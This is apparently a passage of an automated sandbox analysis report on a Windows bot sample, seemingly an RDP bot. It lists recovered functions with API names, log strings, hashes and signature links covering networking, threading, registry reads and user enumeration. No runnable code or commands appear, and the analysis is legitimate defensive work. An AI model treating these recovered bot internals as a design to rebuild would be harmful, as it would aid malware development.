                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                    • API String ID: 3154682637-708158336
                    • Opcode ID: 48bcb164c9fc3a4126ab8f11bb80280af38d06ad61882bf559dc1bdf0a13afbf
                    • Instruction ID: 0af79300722918e36015c8b8e59689991538625a6491e75bffb0e3765fa95fc6
                    • Opcode Fuzzy Hash: 48bcb164c9fc3a4126ab8f11bb80280af38d06ad61882bf559dc1bdf0a13afbf
                    • Instruction Fuzzy Hash: D051A221A0D64292FA209FADE820679B750EF967E4F140335EB2D47AE5EE7CF9058700
                    Function 00007FF8BFB81C3C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                    • API String ID: 3154682637-708158336
                    • Opcode ID: 2d900ad6aae016cb7881416d4035a0b61a834254d7316688dcb34bb133ddfa1a
                    • Instruction ID: 97a53e246706e74a661dee50ec7589796c367e2b6a0b2d83f33e373b99cdf991
                    • Opcode Fuzzy Hash: 2d900ad6aae016cb7881416d4035a0b61a834254d7316688dcb34bb133ddfa1a
                    • Instruction Fuzzy Hash: 8251D361A0E64282FA249FEDE8002B97350AFC57E4F148335DB6E87AD6EE7CE405C700
                    Function 00007FF8B915256C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                    • API String ID: 3154682637-708158336
                    • Opcode ID: 480825a7f3e30da42117ec77c43a9a645fda6539583568eb973d0f60dc714624
                    • Instruction ID: 1743b3714314608f29ace11e4a20f0004e5f4b84467e38a7000053a60e9eaadd
                    • Opcode Fuzzy Hash: 480825a7f3e30da42117ec77c43a9a645fda6539583568eb973d0f60dc714624
                    • Instruction Fuzzy Hash: 0151E162E0C6C342E6608F2DE8502BA7B51AF857E4F140735DB2E86AE5EE7CF545E700
                    Function 00007FF8BA50256C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                    • API String ID: 3154682637-708158336
                    • Opcode ID: 14883c677a07027e0c611d24d643234e2c749e44aaac6b3bbce7a29d53d8c958
                    • Instruction ID: f29e85f105b10e1bd06e04ae41825b6e67d40bf1252c40f9d2709c6baae08e45
                    • Opcode Fuzzy Hash: 14883c677a07027e0c611d24d643234e2c749e44aaac6b3bbce7a29d53d8c958
                    • Instruction Fuzzy Hash: 4B51C171A0C64691E6715B9DAC9027E7A50AF577F0F0403B6EF2E866E5EE3CE7498300
                    Function 00007FF8B91850EC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                    • API String ID: 3154682637-708158336
                    • Opcode ID: 140c814d8350784d58d8024ff37c9b0f12ab94c9893da5a29beb4d75926b9086
                    • Instruction ID: de474c9d2c9ad6b980b99baed5f8b6aa1678db97d3a3f7e6e52bb6d4fb79f21f
                    • Opcode Fuzzy Hash: 140c814d8350784d58d8024ff37c9b0f12ab94c9893da5a29beb4d75926b9086
                    • Instruction Fuzzy Hash: A851A021B0C6C242EA205F5EE8803B97651EF447F4F141376EA6E476E6EE7CE506B701
                    Function 00007FF8BFB53B21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                    • API String ID: 1412730629-3633878399
                    • Opcode ID: 9f20d362d937536f0ee4103508d9b1139d0d6585478f89b21611969e913930d6
                    • Instruction ID: 34251e4118015d1a3cd8e34aa02af7461437978ae0d5fac4d080070c235717f1
                    • Opcode Fuzzy Hash: 9f20d362d937536f0ee4103508d9b1139d0d6585478f89b21611969e913930d6
                    • Instruction Fuzzy Hash: 45512666A0C74392FA2057DCA4E53786362AF053F5F280632C76E063E1DE6EB9A58711
                    Function 00007FF8BFB89FE1 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                    • API String ID: 1412730629-3633878399
                    • Opcode ID: 0b0dd3b090767c9c6ff8a136659d1bb65f72dbfd72b78c7ca576c1129c5fc752
                    • Instruction ID: 7029d1a61f42383389ed57fb7f42d51e057ae3b48eec118ce04ae9991a799835
                    • Opcode Fuzzy Hash: 0b0dd3b090767c9c6ff8a136659d1bb65f72dbfd72b78c7ca576c1129c5fc752
                    • Instruction Fuzzy Hash: 4B51F210A0C74792FB706BDC94C43B8A3599F857E5F644336C72E562D3EE9EA885D301
                    Function 00007FF8B9151D21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                    • API String ID: 1412730629-3633878399
                    • Opcode ID: 1286dc77dc5ff8d206b4c73fae07ba457630e6e20bbab24515aaab937f7757d7
                    • Instruction ID: 439605a239a1357b075b33eedc372639c47cc1df4772bc1f6d6864ff7e16bfdc
                    • Opcode Fuzzy Hash: 1286dc77dc5ff8d206b4c73fae07ba457630e6e20bbab24515aaab937f7757d7
                    • Instruction Fuzzy Hash: 0551F720E0C7C382FA225F1CA4A437866529F053E5F668736C76E462E1DF6DF989B301
                    Function 00007FF8BA501D21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                    • API String ID: 1412730629-3633878399
                    • Opcode ID: f00f92d452ba0ff8bb84cbfee4095df9768404c10da2e6ff7e6b6f0979107802
                    • Instruction ID: a6803ce8feda95486f9c63f9d31e1f9769a19dfbf08915d447eae02df24aa0eb
                    • Opcode Fuzzy Hash: f00f92d452ba0ff8bb84cbfee4095df9768404c10da2e6ff7e6b6f0979107802
                    • Instruction Fuzzy Hash: 8E51E661A0C603D2FA7057ADACC43792651AB073E4F6407B7DF2E462F1DE6DAB85C212
                    Function 00007FF8B918F401 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                    • API String ID: 1412730629-3633878399
                    • Opcode ID: 6b8a36cc971b699367ac3bf5157fbd41f4ace45a84db308636fec646c69488e6
                    • Instruction ID: 3df02d1f11550c651cfb7ddace372933f4cea60f761bd2cd95179f2619654079
                    • Opcode Fuzzy Hash: 6b8a36cc971b699367ac3bf5157fbd41f4ace45a84db308636fec646c69488e6
                    • Instruction Fuzzy Hash: 97512A60A0C7C782F7215F1CA4C43782251AF153F4F760336DB6E463E2DE6DA986B282
                    Function 00007FF708876242 Relevance: 27.2, APIs: 7, Strings: 11, Instructions: 241memorystringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                    • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
                    • API String ID: 1423203057-595982613
                    • Opcode ID: bad0c103a127c9cdb1a0c44690f22b73e500e9a6574fe954518fc977e8e16574
                    • Instruction ID: 3d48c9d43ecd5327b25449b6fd0dfc4ea74cb2f6a26d8eadc8a0f2cc1ec928a0
                    • Opcode Fuzzy Hash: bad0c103a127c9cdb1a0c44690f22b73e500e9a6574fe954518fc977e8e16574
                    • Instruction Fuzzy Hash: BEA1D762A2DA8281EA60EB01DC40BB9E771BF61784FC84035DD4D477D5EF2CE5A5C328
                    Function 00007FF708875602 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 246registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-2022313065
                    • Opcode ID: 6d7b1d7a82180f13f5c9ceae75fa61d5e9adb965a826242bd4464cf54556d294
                    • Instruction ID: 85fda73edeea37c8420aacd221f5101940fe1f83d1b9829393dc74c1988e7c30
                    • Opcode Fuzzy Hash: 6d7b1d7a82180f13f5c9ceae75fa61d5e9adb965a826242bd4464cf54556d294
                    • Instruction Fuzzy Hash: 86A11B21D2C70B82F730F744AC40BBAE260AF04758ED40132D95E066E5EF6DE9E5972A
                    Function 00007FF8BFAB63CB Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 134memorythreadCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocCreateEnterLeaveProcessThread
                    • String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
                    • API String ID: 3282357527-375624272
                    • Opcode ID: 8b38115b2f7d45cf42f4f7eadd5d8fe5da040056d6aa5160cde66468e4858be9
                    • Instruction ID: 3873bb9751f0ff6d647de98f002c4fd665000a948b187fc87c44e1813b065fea
                    • Opcode Fuzzy Hash: 8b38115b2f7d45cf42f4f7eadd5d8fe5da040056d6aa5160cde66468e4858be9
                    • Instruction Fuzzy Hash: DF513D20A08E0245FA1C9B9DA8623B92395AF41BECF142731DB2E07BE7DE3DA4558341
                    Function 00007FF8B9153C65 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                    • API String ID: 2122475568-588975189
                    • Opcode ID: ea011fd3911eba31b5ed846103687ee14d0c618340a10d4a4ea74dd2289fbe6d
                    • Instruction ID: 3a0847368ca690a1cbb1cebd95ad61e1a1bf52fa469016e148e31c5da22fb28e
                    • Opcode Fuzzy Hash: ea011fd3911eba31b5ed846103687ee14d0c618340a10d4a4ea74dd2289fbe6d
                    • Instruction Fuzzy Hash: 91513AB6A08B82C6EB51CF29E45436977A1FB89B88F414136DB4D93398DF3CE849D700
                    Function 00007FF8B9153C6C Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                    • API String ID: 2122475568-588975189
                    • Opcode ID: 094797508034af9aeb41acd87ce8deab58e064fb6417c2c767a88e0e44c012d1
                    • Instruction ID: 79bdf4cb8667eeb3b6299c793f2a5ee148412940fac0a96798b0615e700eaa36
                    • Opcode Fuzzy Hash: 094797508034af9aeb41acd87ce8deab58e064fb6417c2c767a88e0e44c012d1
                    • Instruction Fuzzy Hash: EF513AB6A08B82C6EB50CF29E45436977A1FB89B88F414136DB4D93398DF3CE849D700
                    Function 00007FF8B9153C73 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
